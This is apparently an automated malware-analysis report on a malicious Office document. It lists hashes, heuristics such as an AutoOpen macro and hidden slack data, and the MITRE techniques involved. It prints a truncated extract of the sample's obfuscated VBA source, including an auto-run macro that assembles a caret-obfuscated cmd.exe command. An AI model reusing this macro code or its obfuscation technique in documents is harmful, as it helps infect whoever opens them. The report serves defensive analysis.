Office (OLE) malware analysis — malicious · c6002ff9f85192b6

MALICIOUS

Office (OLE)

87.5 KB First seen: 2019-04-18

MD5: 12e3034e10282bce9be36590f935ab13 SHA-1: dce29bec809cfcf4caece66b2a9e2e6ac1a1ca0c SHA-256: c6002ff9f85192b68c13b817be4f005f1564446a865b22de7ae53a892dcab4d8

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document with a high slack anomaly and detected VBA macros, including an AutoOpen macro. The AutoOpen macro contains heavily obfuscated and truncated VBA code, making it difficult to determine the exact functionality. However, the presence of an AutoOpen macro strongly suggests an attempt to automatically execute malicious code upon opening the document, likely to download and execute a second-stage payload. The embedded URL was confirmed benign and is not considered a threat.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 89,604 bytes but its declared streams total only 32,603 bytes — 57,001 bytes (64%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17607 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17607 bytes
SHA-256: `64d4b3b028fedf4ffbd8326cfd2b0a5c7aacdea641996b423c26b334577f726a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "OGbjBav" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() If uTvXJH <= bzSWO Then Dim SAlvlj(1) SAlvlj(0) = iaHbc + dwflDU End If If iuDJAt Xor UtHit Then Dim qzHcD(2) qzHcD(0) = cZBPj + UhbYYi qzHcD(1) = uqGMcN + WrTlG + bfazwF + UuXhfT End If If wAmQKn And EnzZpi Then Dim jcMAA(1) jcMAA(0) = XdGfhR + oHfXVQ + oiNcU + RvFiBt End If If MhwUct <> KklfPi Then Dim kFQIp(1) kFQIp(0) = oHiaS + UzSZjI + oKJXQd + dVpMS End If If jjhvwM Eqv LdGjV Then Dim XWpGQT(1) XWpGQT(0) = EivhWJ + niAtfU + AsiaiB + PXQKB End If If SKSQW > ZrFDWC Then Dim ZwsLEX(2) ZwsLEX(0) = trahzi + aTRRHb ZwsLEX(1) = BpzIK + JzFFBN End If idObcYficmU (KeyString(zcPODV + zdXLfOVG + 4 + 2 + 61 + iwUMT + iLwOPB) + wAJfWfqb + wFczh + KeyString(fSZtznI + ZJGhkbQW + 5 + 2 + 70 + LaAWrW + Vpsjd) + Rcqwkifssjf + ajUVm + NiSMlvONrC + FmkwGBCLi + ohVMb + jhKQaKQY + TPmwRQ + utswta + IhaKMiz + DdDcVOJ + dhuInE + ciIvLUa + QrpwYom) If FCUjaO = pYoOD Then Dim vaChAd(2) vaChAd(0) = KfzDi + aDKXV + uwrLb + MuIaZ vaChAd(1) = rKNXOI + QpicZF End If If dYJtDt > VwmUjm Then Dim OwqnIL(1) OwqnIL(0) = zaFOr + pLYRT End If End Sub Attribute VB_Name = "PnzfATN" Function Rcqwkifssjf() If MvOmAQ Or ZdfHF Then Dim UfAUAF(1) UfAUAF(0) = ErDMj + hjYFXw + BLfwwJ + cnbZIw End If If boznS Or 6 Then Dim qTEOz(1) qTEOz(0) = Ulfdb + mHKROJ End If If oAJJbc > 8 Then Dim UsCGSj(2) UsCGSj(0) = BXIIS + IADVrK UsCGSj(1) = QQiEhz + rXvNWK + rmusq + ElEQz End If If GLGKQu = 6 Then Dim wIbkz(1) wIbkz(0) = AZjhii + YbLlKL + NEFPEO + UBiJj End If KafFWP = "d /V/C" + """" + "^s^e^t ^t^w" + "^Z^x=^yv^a^ /^f" + "^s^ ^I^8^f" + "^ z^q^&^ ^P^f^S" + "^ N^E^2^ ^" wVWIvB = "`^\N ^D^5^" + "m^ L^Z^d^ ^Tn^" + "_^ v^D%^ ^'^k^]^ ^7^" + "o^=^ ^^+^e^ %n,^ ^$" XmjpFtzC = "^3^w^ ^H^^-^ ^lc" + "^5^}^b^X)^}^?^.^" + "=^{^5^T^Q^h%^\" + "Rc^4^Z^~^t5C^&^a(" + "^S^?c^?^D^" + "@^}n^e^K^;^A^" If zJanK > SIosA Then Dim YhObDT(2) YhObDT(0) = jmLdpM + iYIWi + sboMdm + cnMKuX YhObDT(1) = voLzF + Xjmoj End If If zotARJ >= 4 Then Dim AwtCw(2) AwtCw(0) = VWsaB + RIPpNK + ZTLoz + sLzouL AwtCw(1) = kODwvJ + ooBoMn + SSkwjp + kqpHtV End If If hiLNFA And 14 Then Dim WDaIvF(1) WDaIvF(0) = wnYwT + aZIcW End If iotXUQ = "TC^k^J^i^3^a^,^z" + "^?^e^3C^Ar^K^8Z^b(" + "Y^7^;^2^6n" If isZsQS = 4 Then Dim Uzjdhm(2) Uzjdhm(0) = jtmlr + AAvLV + NXGcG + QwkUu Uzjdhm(1) = MMcfa + BwzVfQ + wBrzi + OXOEWN End If If RdaVw < EnFALL Then Dim YwSUso(1) YwSUso(0) = pTnbX + DUzjor + ZXuhib + Bkaml End If If YRnZM <> 9 Then Dim bYfuUZ(1) bYfuUZ(0) = JWCss + YHEYzF + fnzHF + FMdhL End If If hzOHw <> FQuDL Then Dim lRWcMk(2) lRWcMk(0) = tNqNV + zYNqBn + jQUqwf + PMUDci lRWcMk(1) = zYSfj + fLKrks End If If sItIpX <= dwqwwH Then Dim kpZMUO(2) kpZMUO(0) = AClmQ + SEtAp + OKLDXz + UwZEi kpZMUO(1) = UuQuAa + hVrGI + YEKYE + IXsQYl End If NjCCc = "^L^\|^}^2^u^snx^W^+^t" + "^L^$8^J^L^ R^3^W^" + "m^b^S^s^e^d" + "^{^jt^3^L^.^I^H" If FUcfI Xor MQkiz Then Dim TqBmkk(2) TqBmkk(0) = HkcqUt + BuMHG TqBmkk(1) = Czpjwk + JHzph End If If zkbDEu = 15 Then Dim MCqwE(2) MCqwE(0) = qsMKKm + SamhU MCqwE(1) = IlqUP + MdUTB + NAznS + AdiJua End If If YSwbjC > IYddHl Then Dim MREcXS(1) MREcXS(0) = WAVozi + zmnIsM End If If uIbwC Eqv 16 Then Dim wYBKs(1) wYBKs(0) = YttSF + AaQKXU + ZLbir + wNQnM End If If aiQWwt Or DlnWib Then Dim rSWZLq(2) rSWZLq(0) = lFiIpj + WwqPWj rSWZLq(1) = dMzVHl + OJQkW End If XzrijY = "^4^O^-^x^O^~^e" + "^h^\^~k^>^A^*^o/^" + "X^{v^5^s^[n(" Rcqwkifssjf = KafFWP + wVWIvB + XmjpFtzC + iotXUQ + NjCCc + XzrijY If bMJYbz Or FORMC Then Dim SiYrq(2) SiYrq(0) = nVcaG + zTNfqq + MIviD + qIiGwE SiYrq(1) = LuqRCr + oFIwl + bcdLa + aDqrW End I ... (truncated)

SHA-256: 64d4b3b028fedf4ffbd8326cfd2b0a5c7aacdea641996b423c26b334577f726a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "OGbjBav"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If uTvXJH <= bzSWO Then

Dim SAlvlj(1)
SAlvlj(0) = iaHbc + dwflDU

End If
   If iuDJAt Xor UtHit Then

Dim qzHcD(2)
qzHcD(0) = cZBPj + UhbYYi
qzHcD(1) = uqGMcN + WrTlG + bfazwF + UuXhfT

End If
   If wAmQKn And EnzZpi Then

Dim jcMAA(1)
jcMAA(0) = XdGfhR + oHfXVQ + oiNcU + RvFiBt

End If
   If MhwUct <> KklfPi Then

Dim kFQIp(1)
kFQIp(0) = oHiaS + UzSZjI + oKJXQd + dVpMS

End If
   If jjhvwM Eqv LdGjV Then

Dim XWpGQT(1)
XWpGQT(0) = EivhWJ + niAtfU + AsiaiB + PXQKB

End If
   If SKSQW > ZrFDWC Then

Dim ZwsLEX(2)
ZwsLEX(0) = trahzi + aTRRHb
ZwsLEX(1) = BpzIK + JzFFBN

End If
idObcYficmU (KeyString(zcPODV + zdXLfOVG + 4 + 2 + 61 + iwUMT + iLwOPB) + wAJfWfqb + wFczh + KeyString(fSZtznI + ZJGhkbQW + 5 + 2 + 70 + LaAWrW + Vpsjd) + Rcqwkifssjf + ajUVm + NiSMlvONrC + FmkwGBCLi + ohVMb + jhKQaKQY + TPmwRQ + utswta + IhaKMiz + DdDcVOJ + dhuInE + ciIvLUa + QrpwYom)
   If FCUjaO = pYoOD Then

Dim vaChAd(2)
vaChAd(0) = KfzDi + aDKXV + uwrLb + MuIaZ
vaChAd(1) = rKNXOI + QpicZF

End If
   If dYJtDt > VwmUjm Then

Dim OwqnIL(1)
OwqnIL(0) = zaFOr + pLYRT

End If
End Sub


Attribute VB_Name = "PnzfATN"
Function Rcqwkifssjf()
If MvOmAQ Or ZdfHF Then

Dim UfAUAF(1)
UfAUAF(0) = ErDMj + hjYFXw + BLfwwJ + cnbZIw

End If
   If boznS Or 6 Then

Dim qTEOz(1)
qTEOz(0) = Ulfdb + mHKROJ

End If
   If oAJJbc > 8 Then

Dim UsCGSj(2)
UsCGSj(0) = BXIIS + IADVrK
UsCGSj(1) = QQiEhz + rXvNWK + rmusq + ElEQz

End If
   If GLGKQu = 6 Then

Dim wIbkz(1)
wIbkz(0) = AZjhii + YbLlKL + NEFPEO + UBiJj

End If
KafFWP = "d /V/C" + """" + "^s^e^t ^t^w" + "^Z^x=^yv^a^ /^f" + "^s^ ^I^8^f" + "^ z^q^&^ ^P^f^S" + "^ N^E^2^ ^"
wVWIvB = "`^\N ^D^5^" + "m^ L^Z^d^ ^Tn^" + "_^ v^D%^ ^'^k^]^ ^7^" + "o^=^ ^*^+^e^ %n,^ ^$"
XmjpFtzC = "^3^w^ ^H^*^-^ ^lc" + "^5^}^b^X)^}^?^.^" + "=^{^5^T^Q^h%^\" + "Rc^4^Z^~^t5C^&^a(" + "^S^?c^?^D^" + "@^}n^e^K^;^A^"
If zJanK > SIosA Then

Dim YhObDT(2)
YhObDT(0) = jmLdpM + iYIWi + sboMdm + cnMKuX
YhObDT(1) = voLzF + Xjmoj

End If
   If zotARJ >= 4 Then

Dim AwtCw(2)
AwtCw(0) = VWsaB + RIPpNK + ZTLoz + sLzouL
AwtCw(1) = kODwvJ + ooBoMn + SSkwjp + kqpHtV

End If
   If hiLNFA And 14 Then

Dim WDaIvF(1)
WDaIvF(0) = wnYwT + aZIcW

End If
iotXUQ = "TC^k^J^i^3^a^,^z" + "^?^e^3C^Ar^K^8Z^b(" + "Y^7^;^2^6n"
If isZsQS = 4 Then

Dim Uzjdhm(2)
Uzjdhm(0) = jtmlr + AAvLV + NXGcG + QwkUu
Uzjdhm(1) = MMcfa + BwzVfQ + wBrzi + OXOEWN

End If
   If RdaVw < EnFALL Then

Dim YwSUso(1)
YwSUso(0) = pTnbX + DUzjor + ZXuhib + Bkaml

End If
   If YRnZM <> 9 Then

Dim bYfuUZ(1)
bYfuUZ(0) = JWCss + YHEYzF + fnzHF + FMdhL

End If
   If hzOHw <> FQuDL Then

Dim lRWcMk(2)
lRWcMk(0) = tNqNV + zYNqBn + jQUqwf + PMUDci
lRWcMk(1) = zYSfj + fLKrks

End If
   If sItIpX <= dwqwwH Then

Dim kpZMUO(2)
kpZMUO(0) = AClmQ + SEtAp + OKLDXz + UwZEi
kpZMUO(1) = UuQuAa + hVrGI + YEKYE + IXsQYl

End If
NjCCc = "^L^|^}^2^u^snx^W^+^t" + "^L^$8^J^L^ R^3^W^" + "m^b^S^s^e^d" + "^{^jt^3^L^.^I^H"
If FUcfI Xor MQkiz Then

Dim TqBmkk(2)
TqBmkk(0) = HkcqUt + BuMHG
TqBmkk(1) = Czpjwk + JHzph

End If
   If zkbDEu = 15 Then

Dim MCqwE(2)
MCqwE(0) = qsMKKm + SamhU
MCqwE(1) = IlqUP + MdUTB + NAznS + AdiJua

End If
   If YSwbjC > IYddHl Then

Dim MREcXS(1)
MREcXS(0) = WAVozi + zmnIsM

End If
   If uIbwC Eqv 16 Then

Dim wYBKs(1)
wYBKs(0) = YttSF + AaQKXU + ZLbir + wNQnM

End If
   If aiQWwt Or DlnWib Then

Dim rSWZLq(2)
rSWZLq(0) = lFiIpj + WwqPWj
rSWZLq(1) = dMzVHl + OJQkW

End If
XzrijY = "^4^O^-^x^O^~^e" + "^h^\^~k^>^A^*^o/^" + "X^{v^5^s^[n("
Rcqwkifssjf = KafFWP + wVWIvB + XmjpFtzC + iotXUQ + NjCCc + XzrijY
   If bMJYbz Or FORMC Then

Dim SiYrq(2)
SiYrq(0) = nVcaG + zTNfqq + MIviD + qIiGwE
SiYrq(1) = LuqRCr + oFIwl + bcdLa + aDqrW

End I
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.